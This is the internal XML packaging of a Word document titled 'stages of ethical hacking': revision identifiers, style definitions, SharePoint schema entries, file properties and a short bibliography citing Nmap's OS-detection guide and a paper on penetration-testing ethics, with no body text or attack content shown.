    <w:rsid w:val="004A4669"/>
    <w:rsid w:val="004B0E03"/>
    <w:rsid w:val="004B0E42"/>
    <w:rsid w:val="004B469A"/>
    <w:rsid w:val="004B510F"/>
    <w:rsid w:val="004B7184"/>
    <w:rsid w:val="004C05A4"/>
    <w:rsid w:val="004C386E"/>
    <w:rsid w:val="004C5C0E"/>
    <w:rsid w:val="004C7070"/>
    <w:rsid w:val="004D0852"/>
    <w:rsid w:val="004D0AFB"/>
    <w:rsid w:val="004D0CF0"/>
    <w:rsid w:val="004D189C"/>
    <w:rsid w:val="004D68E5"/>
    <w:rsid w:val="004D6DC0"/>
    <w:rsid w:val="004E2F32"/>
    <w:rsid w:val="004E4EF7"/>
    <w:rsid w:val="004F1002"/>
    <w:rsid w:val="004F2947"/>
    <w:rsid w:val="004F2FF9"/>
    <w:rsid w:val="004F418F"/>
    <w:rsid w:val="004F65E6"/>
    <w:rsid w:val="005055E9"/>
    <w:rsid w:val="0051097C"/>
    <w:rsid w:val="0051112F"/>
    <w:rsid w:val="0051173B"/>
    <w:rsid w:val="00520F36"/>
    <w:rsid w:val="0052149E"/>
    <w:rsid w:val="00522A87"/>
    <w:rsid w:val="005248D8"/>
    <w:rsid w:val="00524A22"/>
    <w:rsid w:val="005264E8"/>
    <w:rsid w:val="005279C5"/>
    <w:rsid w:val="00533B3A"/>
    <w:rsid w:val="00533CBF"/>
    <w:rsid w:val="005346F3"/>
    <w:rsid w:val="00534ED9"/>
    <w:rsid w:val="005353B1"/>
    <w:rsid w:val="00536C52"/>
    <w:rsid w:val="005407AA"/>
    <w:rsid w:val="005409A4"/>
    <w:rsid w:val="00541231"/>
    <w:rsid w:val="005439F9"/>
    <w:rsid w:val="00547668"/>
    <w:rsid w:val="00554F5B"/>
    <w:rsid w:val="00556CC4"/>
    <w:rsid w:val="00557EC9"/>
    <w:rsid w:val="00560C24"/>
    <w:rsid w:val="00566494"/>
    <w:rsid w:val="005738BF"/>
    <w:rsid w:val="00573ADB"/>
    <w:rsid w:val="0057478E"/>
    <w:rsid w:val="005761FB"/>
    <w:rsid w:val="005779DC"/>
    <w:rsid w:val="005836F3"/>
    <w:rsid w:val="005865FC"/>
    <w:rsid w:val="0059404C"/>
    <w:rsid w:val="005A3380"/>
    <w:rsid w:val="005B28C9"/>
    <w:rsid w:val="005C2F1F"/>
    <w:rsid w:val="005C59B4"/>
    <w:rsid w:val="005D094E"/>
    <w:rsid w:val="005E398E"/>
    <w:rsid w:val="005E734F"/>
    <w:rsid w:val="005E7677"/>
    <w:rsid w:val="005E77E9"/>
    <w:rsid w:val="005F3987"/>
    <w:rsid w:val="005F62FA"/>
    <w:rsid w:val="005F7A1D"/>
    <w:rsid w:val="00607E1F"/>
    <w:rsid w:val="00610989"/>
    <w:rsid w:val="00612603"/>
    <w:rsid w:val="0061262D"/>
    <w:rsid w:val="0061758E"/>
    <w:rsid w:val="006213AC"/>
    <w:rsid w:val="006221F8"/>
    <w:rsid w:val="006242CB"/>
    <w:rsid w:val="00626B94"/>
    <w:rsid w:val="006316BF"/>
    <w:rsid w:val="00632235"/>
    <w:rsid w:val="006373E0"/>
    <w:rsid w:val="006502C5"/>
    <w:rsid w:val="00650F21"/>
    <w:rsid w:val="00651DD2"/>
    <w:rsid w:val="00653D51"/>
    <w:rsid w:val="006566F2"/>
    <w:rsid w:val="0066439A"/>
    <w:rsid w:val="00665CE5"/>
    <w:rsid w:val="006707B5"/>
    <w:rsid w:val="006734ED"/>
    <w:rsid w:val="00674CC8"/>
    <w:rsid w:val="00676EE9"/>
    <w:rsid w:val="00681A4E"/>
    <w:rsid w:val="006900EB"/>
    <w:rsid w:val="0069153C"/>
    <w:rsid w:val="0069462A"/>
    <w:rsid w:val="00695C2D"/>
    <w:rsid w:val="006A0AE3"/>
    <w:rsid w:val="006A0B3E"/>
    <w:rsid w:val="006A4EE7"/>
    <w:rsid w:val="006A7208"/>
    <w:rsid w:val="006B1E0C"/>
    <w:rsid w:val="006B613E"/>
    <w:rsid w:val="006B662E"/>
    <w:rsid w:val="006C15CC"/>
    <w:rsid w:val="006C3E96"/>
    <w:rsid w:val="006D1517"/>
    <w:rsid w:val="006D1F04"/>
    <w:rsid w:val="006D294E"/>
    <w:rsid w:val="006D306C"/>
    <w:rsid w:val="006E0338"/>
    <w:rsid w:val="006E0721"/>
    <w:rsid w:val="006E36C5"/>
    <w:rsid w:val="006E4284"/>
    <w:rsid w:val="006E47B6"/>
    <w:rsid w:val="006E624F"/>
    <w:rsid w:val="006F30A4"/>
    <w:rsid w:val="006F4D3F"/>
    <w:rsid w:val="00703CA9"/>
    <w:rsid w:val="0070531E"/>
    <w:rsid w:val="00705618"/>
    <w:rsid w:val="00711811"/>
    <w:rsid w:val="00711A0C"/>
    <w:rsid w:val="007121E9"/>
    <w:rsid w:val="0072315A"/>
    <w:rsid w:val="007232EF"/>
    <w:rsid w:val="007302F9"/>
    <w:rsid w:val="007359BD"/>
    <w:rsid w:val="0074049E"/>
    <w:rsid w:val="0074131A"/>
    <w:rsid w:val="007448FD"/>
    <w:rsid w:val="00745212"/>
    <w:rsid w:val="007453A3"/>
    <w:rsid w:val="007535E9"/>
    <w:rsid w:val="007538DE"/>
    <w:rsid w:val="007619AD"/>
    <w:rsid w:val="00763354"/>
    <w:rsid w:val="007677ED"/>
    <w:rsid w:val="007701E2"/>
    <w:rsid w:val="0077031D"/>
    <w:rsid w:val="00772C62"/>
    <w:rsid w:val="0077316F"/>
    <w:rsid w:val="00776CD3"/>
    <w:rsid w:val="0078677F"/>
    <w:rsid w:val="00790254"/>
    <w:rsid w:val="007904C9"/>
    <w:rsid w:val="007915EE"/>
    <w:rsid w:val="007937C1"/>
    <w:rsid w:val="007942B2"/>
    <w:rsid w:val="00797B44"/>
    <w:rsid w:val="007A0D07"/>
    <w:rsid w:val="007A2F60"/>
    <w:rsid w:val="007A3BB5"/>
    <w:rsid w:val="007B3E5C"/>
    <w:rsid w:val="007B4CA4"/>
    <w:rsid w:val="007B765E"/>
    <w:rsid w:val="007C1A8B"/>
    <w:rsid w:val="007C3008"/>
    <w:rsid w:val="007C689B"/>
    <w:rsid w:val="007D175E"/>
    <w:rsid w:val="007D253E"/>
    <w:rsid w:val="007D5D96"/>
    <w:rsid w:val="007E2459"/>
    <w:rsid w:val="007E4828"/>
    <w:rsid w:val="007E7945"/>
    <w:rsid w:val="007E7FCD"/>
    <w:rsid w:val="007F1255"/>
    <w:rsid w:val="007F240D"/>
    <w:rsid w:val="007F3EA5"/>
    <w:rsid w:val="007F59B8"/>
    <w:rsid w:val="007F6894"/>
    <w:rsid w:val="007F767F"/>
    <w:rsid w:val="00801605"/>
    <w:rsid w:val="00801AB0"/>
    <w:rsid w:val="00807DCC"/>
    <w:rsid w:val="008148AD"/>
    <w:rsid w:val="00817092"/>
    <w:rsid w:val="008207AB"/>
    <w:rsid w:val="00820C3A"/>
    <w:rsid w:val="00820DB5"/>
    <w:rsid w:val="00825ECB"/>
    <w:rsid w:val="00830949"/>
    <w:rsid w:val="00831E09"/>
    <w:rsid w:val="00833135"/>
    <w:rsid w:val="0083557A"/>
    <w:rsid w:val="00837008"/>
    <w:rsid w:val="008425B5"/>
    <w:rsid w:val="00852485"/>
    <w:rsid w:val="00856745"/>
    <w:rsid w:val="00856C21"/>
    <w:rsid w:val="00862694"/>
    <w:rsid w:val="00862EA5"/>
    <w:rsid w:val="00866705"/>
    <w:rsid w:val="00866F15"/>
    <w:rsid w:val="008671A4"/>
    <w:rsid w:val="00872DC3"/>
    <w:rsid w:val="00875DFB"/>
    <w:rsid w:val="00890144"/>
    <w:rsid w:val="008908A4"/>
    <w:rsid w:val="008910F8"/>
    <w:rsid w:val="0089259C"/>
    <w:rsid w:val="00896434"/>
    <w:rsid w:val="00897DFE"/>
    <w:rsid w:val="008A5801"/>
    <w:rsid w:val="008A62B5"/>
    <w:rsid w:val="008B0E62"/>
    <w:rsid w:val="008B2305"/>
    <w:rsid w:val="008B457D"/>
    <w:rsid w:val="008B4F85"/>
    <w:rsid w:val="008C1C04"/>
    <w:rsid w:val="008E053A"/>
    <w:rsid w:val="008E1BBA"/>
    <w:rsid w:val="008E3291"/>
    <w:rsid w:val="008F1EA7"/>
    <w:rsid w:val="008F2A63"/>
    <w:rsid w:val="008F43D2"/>
    <w:rsid w:val="008F57DD"/>
    <w:rsid w:val="008F68E3"/>
    <w:rsid w:val="008F79C4"/>
    <w:rsid w:val="00901DBA"/>
    <w:rsid w:val="00906278"/>
    <w:rsid w:val="00907250"/>
    <w:rsid w:val="00917A90"/>
    <w:rsid w:val="00920673"/>
    <w:rsid w:val="0092235A"/>
    <w:rsid w:val="00924292"/>
    <w:rsid w:val="009277F4"/>
    <w:rsid w:val="009317E8"/>
    <w:rsid w:val="00933E8C"/>
    <w:rsid w:val="00941FCB"/>
    <w:rsid w:val="00944A7D"/>
    <w:rsid w:val="00944DE7"/>
    <w:rsid w:val="0095338B"/>
    <w:rsid w:val="00960981"/>
    <w:rsid w:val="009631E4"/>
    <w:rsid w:val="00972EA3"/>
    <w:rsid w:val="00976781"/>
    <w:rsid w:val="00980918"/>
    <w:rsid w:val="009814A6"/>
    <w:rsid w:val="00982E94"/>
    <w:rsid w:val="00985EE8"/>
    <w:rsid w:val="00986E38"/>
    <w:rsid w:val="0099292C"/>
    <w:rsid w:val="009A56D3"/>
    <w:rsid w:val="009A5D89"/>
    <w:rsid w:val="009A73A9"/>
    <w:rsid w:val="009B153D"/>
    <w:rsid w:val="009B3CC2"/>
    <w:rsid w:val="009B47C9"/>
    <w:rsid w:val="009B606B"/>
    <w:rsid w:val="009B6828"/>
    <w:rsid w:val="009C2484"/>
    <w:rsid w:val="009C3803"/>
    <w:rsid w:val="009D176E"/>
    <w:rsid w:val="009D3ED2"/>
    <w:rsid w:val="009E0465"/>
    <w:rsid w:val="009F0255"/>
    <w:rsid w:val="009F160E"/>
    <w:rsid w:val="009F2EC7"/>
    <w:rsid w:val="009F315A"/>
    <w:rsid w:val="009F3CD7"/>
    <w:rsid w:val="00A0195E"/>
    <w:rsid w:val="00A10690"/>
    <w:rsid w:val="00A10A6E"/>
    <w:rsid w:val="00A13474"/>
    <w:rsid w:val="00A134D0"/>
    <w:rsid w:val="00A1421E"/>
    <w:rsid w:val="00A14B22"/>
    <w:rsid w:val="00A15901"/>
    <w:rsid w:val="00A16BAA"/>
    <w:rsid w:val="00A179E4"/>
    <w:rsid w:val="00A2164E"/>
    <w:rsid w:val="00A24793"/>
    <w:rsid w:val="00A25238"/>
    <w:rsid w:val="00A25664"/>
    <w:rsid w:val="00A2592B"/>
    <w:rsid w:val="00A25F1C"/>
    <w:rsid w:val="00A2658B"/>
    <w:rsid w:val="00A31F88"/>
    <w:rsid w:val="00A3261D"/>
    <w:rsid w:val="00A345CA"/>
    <w:rsid w:val="00A3498A"/>
    <w:rsid w:val="00A36690"/>
    <w:rsid w:val="00A43097"/>
    <w:rsid w:val="00A43B24"/>
    <w:rsid w:val="00A54FA2"/>
    <w:rsid w:val="00A553E3"/>
    <w:rsid w:val="00A60959"/>
    <w:rsid w:val="00A63EB9"/>
    <w:rsid w:val="00A64104"/>
    <w:rsid w:val="00A65224"/>
    <w:rsid w:val="00A6718F"/>
    <w:rsid w:val="00A70290"/>
    <w:rsid w:val="00A70CB0"/>
    <w:rsid w:val="00A71D76"/>
    <w:rsid w:val="00A82D53"/>
    <w:rsid w:val="00A8309C"/>
    <w:rsid w:val="00A86154"/>
    <w:rsid w:val="00A961EE"/>
    <w:rsid w:val="00AA22D8"/>
    <w:rsid w:val="00AA5505"/>
    <w:rsid w:val="00AA5CD4"/>
    <w:rsid w:val="00AA6495"/>
    <w:rsid w:val="00AB48B5"/>
    <w:rsid w:val="00AB5FF1"/>
    <w:rsid w:val="00AB6178"/>
    <w:rsid w:val="00AC1EC4"/>
    <w:rsid w:val="00AC2958"/>
    <w:rsid w:val="00AC5833"/>
    <w:rsid w:val="00AC66AE"/>
    <w:rsid w:val="00AD0CB8"/>
    <w:rsid w:val="00AD4383"/>
    <w:rsid w:val="00AD780E"/>
    <w:rsid w:val="00AD7ABD"/>
    <w:rsid w:val="00AE0D79"/>
    <w:rsid w:val="00AE1450"/>
    <w:rsid w:val="00AE70A9"/>
    <w:rsid w:val="00AF3E14"/>
    <w:rsid w:val="00B018AB"/>
    <w:rsid w:val="00B035C0"/>
    <w:rsid w:val="00B04887"/>
    <w:rsid w:val="00B052D0"/>
    <w:rsid w:val="00B1051D"/>
    <w:rsid w:val="00B10C71"/>
    <w:rsid w:val="00B11046"/>
    <w:rsid w:val="00B16D47"/>
    <w:rsid w:val="00B16DA7"/>
    <w:rsid w:val="00B2254A"/>
    <w:rsid w:val="00B234E2"/>
    <w:rsid w:val="00B25E4D"/>
    <w:rsid w:val="00B27696"/>
    <w:rsid w:val="00B301DE"/>
    <w:rsid w:val="00B30C73"/>
    <w:rsid w:val="00B32FAA"/>
    <w:rsid w:val="00B34FE9"/>
    <w:rsid w:val="00B44A96"/>
    <w:rsid w:val="00B452CA"/>
    <w:rsid w:val="00B45A09"/>
    <w:rsid w:val="00B4768A"/>
    <w:rsid w:val="00B47C6D"/>
    <w:rsid w:val="00B548DA"/>
    <w:rsid w:val="00B5572D"/>
    <w:rsid w:val="00B560CA"/>
    <w:rsid w:val="00B56664"/>
    <w:rsid w:val="00B56AF9"/>
    <w:rsid w:val="00B570FF"/>
    <w:rsid w:val="00B6181C"/>
    <w:rsid w:val="00B64540"/>
    <w:rsid w:val="00B74A16"/>
    <w:rsid w:val="00B75943"/>
    <w:rsid w:val="00B7731C"/>
    <w:rsid w:val="00B80C5A"/>
    <w:rsid w:val="00B80EF2"/>
    <w:rsid w:val="00B90F32"/>
    <w:rsid w:val="00B90FD2"/>
    <w:rsid w:val="00B9657B"/>
    <w:rsid w:val="00BA0460"/>
    <w:rsid w:val="00BA1F96"/>
    <w:rsid w:val="00BA2B99"/>
    <w:rsid w:val="00BA35E0"/>
    <w:rsid w:val="00BA4157"/>
    <w:rsid w:val="00BA4881"/>
    <w:rsid w:val="00BB339D"/>
    <w:rsid w:val="00BB514D"/>
    <w:rsid w:val="00BB619C"/>
    <w:rsid w:val="00BC4BF1"/>
    <w:rsid w:val="00BC616A"/>
    <w:rsid w:val="00BD1730"/>
    <w:rsid w:val="00BD3442"/>
    <w:rsid w:val="00BD52E5"/>
    <w:rsid w:val="00BD6EAB"/>
    <w:rsid w:val="00BD77F3"/>
    <w:rsid w:val="00BE054C"/>
    <w:rsid w:val="00BE28F2"/>
    <w:rsid w:val="00BE39F5"/>
    <w:rsid w:val="00BE4A5C"/>
    <w:rsid w:val="00BF3379"/>
    <w:rsid w:val="00BF571D"/>
    <w:rsid w:val="00C00471"/>
    <w:rsid w:val="00C051C1"/>
    <w:rsid w:val="00C05773"/>
    <w:rsid w:val="00C05DF3"/>
    <w:rsid w:val="00C06FB2"/>
    <w:rsid w:val="00C14AC0"/>
    <w:rsid w:val="00C14F95"/>
    <w:rsid w:val="00C152EE"/>
    <w:rsid w:val="00C15E86"/>
    <w:rsid w:val="00C30814"/>
    <w:rsid w:val="00C35BDB"/>
    <w:rsid w:val="00C377E8"/>
    <w:rsid w:val="00C4212A"/>
    <w:rsid w:val="00C422A7"/>
    <w:rsid w:val="00C44B0E"/>
    <w:rsid w:val="00C45FB0"/>
    <w:rsid w:val="00C514E0"/>
    <w:rsid w:val="00C5247A"/>
    <w:rsid w:val="00C52F98"/>
    <w:rsid w:val="00C53E18"/>
    <w:rsid w:val="00C56DF4"/>
    <w:rsid w:val="00C56F1A"/>
    <w:rsid w:val="00C60115"/>
    <w:rsid w:val="00C60DF5"/>
    <w:rsid w:val="00C61238"/>
    <w:rsid w:val="00C614BC"/>
    <w:rsid w:val="00C6165E"/>
    <w:rsid w:val="00C6713C"/>
    <w:rsid w:val="00C70536"/>
    <w:rsid w:val="00C70FB1"/>
    <w:rsid w:val="00C718CA"/>
    <w:rsid w:val="00C76085"/>
    <w:rsid w:val="00C76318"/>
    <w:rsid w:val="00C83249"/>
    <w:rsid w:val="00C85773"/>
    <w:rsid w:val="00C86C74"/>
    <w:rsid w:val="00C917E6"/>
    <w:rsid w:val="00C9394F"/>
    <w:rsid w:val="00C95519"/>
    <w:rsid w:val="00CA3476"/>
    <w:rsid w:val="00CA4623"/>
    <w:rsid w:val="00CA4E71"/>
    <w:rsid w:val="00CA53B0"/>
    <w:rsid w:val="00CA5F37"/>
    <w:rsid w:val="00CA672F"/>
    <w:rsid w:val="00CA73F0"/>
    <w:rsid w:val="00CA7BB5"/>
    <w:rsid w:val="00CB46DC"/>
    <w:rsid w:val="00CC0DC4"/>
    <w:rsid w:val="00CC1332"/>
    <w:rsid w:val="00CC1614"/>
    <w:rsid w:val="00CC7502"/>
    <w:rsid w:val="00CD37F6"/>
    <w:rsid w:val="00CD580C"/>
    <w:rsid w:val="00CE33A8"/>
    <w:rsid w:val="00CE6161"/>
    <w:rsid w:val="00CE7CBE"/>
    <w:rsid w:val="00CF0DF1"/>
    <w:rsid w:val="00CF2EB2"/>
    <w:rsid w:val="00CF39E0"/>
    <w:rsid w:val="00CF6166"/>
    <w:rsid w:val="00CF69A6"/>
    <w:rsid w:val="00D0296B"/>
    <w:rsid w:val="00D038D4"/>
    <w:rsid w:val="00D14CAA"/>
    <w:rsid w:val="00D21575"/>
    <w:rsid w:val="00D26B01"/>
    <w:rsid w:val="00D3143F"/>
    <w:rsid w:val="00D320D3"/>
    <w:rsid w:val="00D33B53"/>
    <w:rsid w:val="00D43C71"/>
    <w:rsid w:val="00D44BF9"/>
    <w:rsid w:val="00D471D6"/>
    <w:rsid w:val="00D47717"/>
    <w:rsid w:val="00D47E1A"/>
    <w:rsid w:val="00D50929"/>
    <w:rsid w:val="00D52F46"/>
    <w:rsid w:val="00D613FA"/>
    <w:rsid w:val="00D638C9"/>
    <w:rsid w:val="00D66288"/>
    <w:rsid w:val="00D7038C"/>
    <w:rsid w:val="00D70909"/>
    <w:rsid w:val="00D720E8"/>
    <w:rsid w:val="00D82430"/>
    <w:rsid w:val="00D84DDE"/>
    <w:rsid w:val="00D8582F"/>
    <w:rsid w:val="00D904E1"/>
    <w:rsid w:val="00D92149"/>
    <w:rsid w:val="00D93C99"/>
    <w:rsid w:val="00D95918"/>
    <w:rsid w:val="00DA2925"/>
    <w:rsid w:val="00DB0304"/>
    <w:rsid w:val="00DB200B"/>
    <w:rsid w:val="00DB2A09"/>
    <w:rsid w:val="00DB37B5"/>
    <w:rsid w:val="00DB4649"/>
    <w:rsid w:val="00DB7ADF"/>
    <w:rsid w:val="00DC4005"/>
    <w:rsid w:val="00DC5FAA"/>
    <w:rsid w:val="00DD3253"/>
    <w:rsid w:val="00DD3EE6"/>
    <w:rsid w:val="00DD434A"/>
    <w:rsid w:val="00DD4790"/>
    <w:rsid w:val="00DD58CF"/>
    <w:rsid w:val="00DD703A"/>
    <w:rsid w:val="00DD7346"/>
    <w:rsid w:val="00DE269F"/>
    <w:rsid w:val="00DE3161"/>
    <w:rsid w:val="00DE41F8"/>
    <w:rsid w:val="00DE6021"/>
    <w:rsid w:val="00DE6722"/>
    <w:rsid w:val="00DF62DF"/>
    <w:rsid w:val="00DF6A14"/>
    <w:rsid w:val="00E00644"/>
    <w:rsid w:val="00E01DAB"/>
    <w:rsid w:val="00E065C5"/>
    <w:rsid w:val="00E0724C"/>
    <w:rsid w:val="00E15850"/>
    <w:rsid w:val="00E15CFC"/>
    <w:rsid w:val="00E15FD8"/>
    <w:rsid w:val="00E21E20"/>
    <w:rsid w:val="00E25963"/>
    <w:rsid w:val="00E315C7"/>
    <w:rsid w:val="00E37478"/>
    <w:rsid w:val="00E40293"/>
    <w:rsid w:val="00E423B5"/>
    <w:rsid w:val="00E43BE5"/>
    <w:rsid w:val="00E50046"/>
    <w:rsid w:val="00E50BBC"/>
    <w:rsid w:val="00E54586"/>
    <w:rsid w:val="00E5642A"/>
    <w:rsid w:val="00E63BA1"/>
    <w:rsid w:val="00E63C1E"/>
    <w:rsid w:val="00E6660B"/>
    <w:rsid w:val="00E71568"/>
    <w:rsid w:val="00E73859"/>
    <w:rsid w:val="00E74DD1"/>
    <w:rsid w:val="00E77535"/>
    <w:rsid w:val="00E853E0"/>
    <w:rsid w:val="00E919AA"/>
    <w:rsid w:val="00E92E7D"/>
    <w:rsid w:val="00EA036A"/>
    <w:rsid w:val="00EA274E"/>
    <w:rsid w:val="00EA7D86"/>
    <w:rsid w:val="00EB0F51"/>
    <w:rsid w:val="00EB17A8"/>
    <w:rsid w:val="00EB231D"/>
    <w:rsid w:val="00EB27BE"/>
    <w:rsid w:val="00EB2B93"/>
    <w:rsid w:val="00EB3A16"/>
    <w:rsid w:val="00EB5263"/>
    <w:rsid w:val="00EB620C"/>
    <w:rsid w:val="00EC2BFD"/>
    <w:rsid w:val="00EC543D"/>
    <w:rsid w:val="00EC5561"/>
    <w:rsid w:val="00ED282A"/>
    <w:rsid w:val="00ED2B13"/>
    <w:rsid w:val="00ED3D6C"/>
    <w:rsid w:val="00ED503C"/>
    <w:rsid w:val="00ED74B6"/>
    <w:rsid w:val="00EE03B6"/>
    <w:rsid w:val="00EE070F"/>
    <w:rsid w:val="00EE1851"/>
    <w:rsid w:val="00EE1AD7"/>
    <w:rsid w:val="00EE6956"/>
    <w:rsid w:val="00EF044F"/>
    <w:rsid w:val="00F03817"/>
    <w:rsid w:val="00F03C79"/>
    <w:rsid w:val="00F04C62"/>
    <w:rsid w:val="00F0591C"/>
    <w:rsid w:val="00F0636B"/>
    <w:rsid w:val="00F06F2D"/>
    <w:rsid w:val="00F140D0"/>
    <w:rsid w:val="00F15421"/>
    <w:rsid w:val="00F16C23"/>
    <w:rsid w:val="00F2004D"/>
    <w:rsid w:val="00F20419"/>
    <w:rsid w:val="00F22746"/>
    <w:rsid w:val="00F2481F"/>
    <w:rsid w:val="00F253D7"/>
    <w:rsid w:val="00F2618F"/>
    <w:rsid w:val="00F273C4"/>
    <w:rsid w:val="00F30D96"/>
    <w:rsid w:val="00F314F4"/>
    <w:rsid w:val="00F34992"/>
    <w:rsid w:val="00F44A69"/>
    <w:rsid w:val="00F47B54"/>
    <w:rsid w:val="00F60B41"/>
    <w:rsid w:val="00F6696B"/>
    <w:rsid w:val="00F74374"/>
    <w:rsid w:val="00F748E3"/>
    <w:rsid w:val="00F75AA7"/>
    <w:rsid w:val="00F77FDF"/>
    <w:rsid w:val="00F81108"/>
    <w:rsid w:val="00F8113B"/>
    <w:rsid w:val="00F8338E"/>
    <w:rsid w:val="00F86722"/>
    <w:rsid w:val="00F87A38"/>
    <w:rsid w:val="00F9068D"/>
    <w:rsid w:val="00F927E8"/>
    <w:rsid w:val="00F96D90"/>
    <w:rsid w:val="00FA536C"/>
    <w:rsid w:val="00FA5B3B"/>
    <w:rsid w:val="00FA690B"/>
    <w:rsid w:val="00FB5ED7"/>
    <w:rsid w:val="00FC2D08"/>
    <w:rsid w:val="00FC3B0C"/>
    <w:rsid w:val="00FC497D"/>
    <w:rsid w:val="00FC5692"/>
    <w:rsid w:val="00FC67C1"/>
    <w:rsid w:val="00FD4B92"/>
    <w:rsid w:val="00FE226B"/>
    <w:rsid w:val="00FE2F2D"/>
    <w:rsid w:val="00FE4A7A"/>
    <w:rsid w:val="00FF1227"/>
    <w:rsid w:val="00FF41C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139B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D859D322-A98F-4DDA-B45B-54DF8E94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C3A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DC4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400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400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C4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D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58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40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C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B61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7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F0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA7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F0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0019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juice-shop.herokuapp.co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F32B3CB661E45973F9D848622CBE1" ma:contentTypeVersion="13" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="7819922a98da362d03534508f000c8d8">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="435f0f50-36fe-4b2b-979a-0ed0e26765d6" xmlns:ns4="6382b1d0-6e1b-4100-a90b-60c5a92f4695" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="306f8ed3bad236d07643ebf6b2b1ab4b" ns3:_="" ns4:_="">
    <xsd:import namespace="435f0f50-36fe-4b2b-979a-0ed0e26765d6"/>
    <xsd:import namespace="6382b1d0-6e1b-4100-a90b-60c5a92f46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f0f50-36fe-4b2b-979a-0ed0e2676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2b1d0-6e1b-4100-a90b-60c5a92f4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5f0f50-36fe-4b2b-979a-0ed0e26765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ma</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{4350C4FA-555D-4446-A78A-290069F56D38}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nmap</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>OS Detection</b:Title>
    <b:URL>https://nmap.org/book/man-os-detection.html</b:URL>
    <b:Year>2023</b:Year>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sha15</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{C6DD35FD-629F-47F8-95CF-2853AAAC6FFB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Faily</b:Last>
            <b:First>Shamal</b:First>
          </b:Person>
          <b:Person>
            <b:Last>McAlaney</b:Last>
            <b:First>John</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Iacob2</b:Last>
            <b:First>Claudia</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Ethical Dilemmas and Dimensions in Penetration Testing </b:Title>
    <b:Year>2015</b:Year>
    <b:URL>https://www.researchgate.net/publication/277308881_Ethical_Dilemmas_and_Dimensions_in_Penetration_Testing</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EF65656E-5C6F-4CBF-8F11-FD52EB519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f0f50-36fe-4b2b-979a-0ed0e26765d6"/>
    <ds:schemaRef ds:uri="6382b1d0-6e1b-4100-a90b-60c5a92f4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B3BC9-725F-4BA0-B2EA-0B867559BE43}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="435f0f50-36fe-4b2b-979a-0ed0e26765d6"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CC7B2D01-FB58-4CA0-925D-236A49664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B2F61-5DB0-41AA-91E8-BDC6842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27</Pages>
  <Words>1924</Words>
  <Characters>10968</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>91</Lines>
  <Paragraphs>25</Paragraphs>
  <ScaleCrop>false</ScaleCrop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stages of ethical hacking</dc:title>
  <dc:subject/>
  <dc:creator>NGUYEN HOANG MINH</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>NGUYEN HOANG MINH</cp:lastModifiedBy>
  <cp:revision>821</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-27T06:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12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F32B3CB661E45973F9D848622CBE1</vt:lpwstr>
  </property>
</Properties>
</file>